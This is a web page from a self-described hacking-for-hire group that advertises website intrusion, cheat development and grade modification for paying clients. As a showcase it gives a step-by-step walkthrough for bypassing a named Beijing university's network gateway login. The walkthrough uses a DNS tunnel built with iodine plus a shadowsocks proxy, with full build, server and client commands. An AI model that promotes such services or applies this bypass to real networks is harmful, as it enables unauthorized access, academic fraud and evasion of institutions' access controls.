HackAPT-打造中国最专业的黑客入侵技术 - 承接一切黑客渗透测试业务

入侵北京某大学网关系统

HackAPT - 打造中国最专业的黑客入侵技术长期承接国内外网站入侵,网络渗透,外挂开发,成绩修改等相关黑客业务. 本团队拥有多位资深老牌黑客,技术实力雄厚有着长期的职业黑客经验并且长期持有CEH,CCIE黑客认证,且长期活跃于Hackone排行榜并帮助过Facebook, Microsoft, Uber, Yahoo日本发现过重大漏洞. 我们的承诺和信心来自于多年入侵经验的成功案例,我们用实力来得到您的认可客服QQ:10172680 邮箱[email protected]

本站所有内容均属于本站原创,部分内容经原创作者授权后转载.

本站实战案例北京邮电大学

北邮网关系统登陆前,即可以进行正常的dns查询,目测网关为了方便用户使用内网域名开放了dns服务

来吧,tcp over dns,见http://drops.wooyun.org/papers/3133 dns隧道的介绍

注册一个lxj616.com,使用iodine建隧道,使用shadowsocks做proxy,不登陆即可正常访问网站(图中为我vps地址)

漏洞证明:

注册一个lxj616.com,使用iodine建隧道,使用shadowsocks做proxy,不登陆即可正常访问网站(图中为我vps地址)

1.申请一个lxj616.com用于dns host(我用的是美国vps+godaddy域名)

(windows版本的在http://code.kryo.se/iodine/下载,以下为linux配置)

2. wget http://code.kryo.se/iodine/iodine-0.7.0.tar.gz

3. tar -zxvf iodine-0.7.0.tar.gz

4. cd iodine-0.7.0 && make

5. 编译好的在bin文件夹下

6.配置lxj616.com的A记录:【VPS地址->ns.lxj616.com】

7.配置lxj616.com的ns记录:【ns.lxj616.com】

8.VPS上运行./iodined -f 192.168.16.1 lxj616.com -P 【密码】 &

9.本地运行 ./iodine -f -r 【VPS地址】 lxj616.com -P 【密码】

10.如果需要通过VPS访问外网,在VPS上建立proxy(比如shadowsocks),在截图中我使用的是shadowsocks(左面部分)

本文系作者个人观点,转载请注明出处!
喜欢 2

相关文章

更多

本站已经正式停止QQ联系方式,如有任何正在合作的客户或有意合作的客户可以通过  [email protected] 跟我们联系!

邮件24小时在线,通常1-2小时会回复!

error: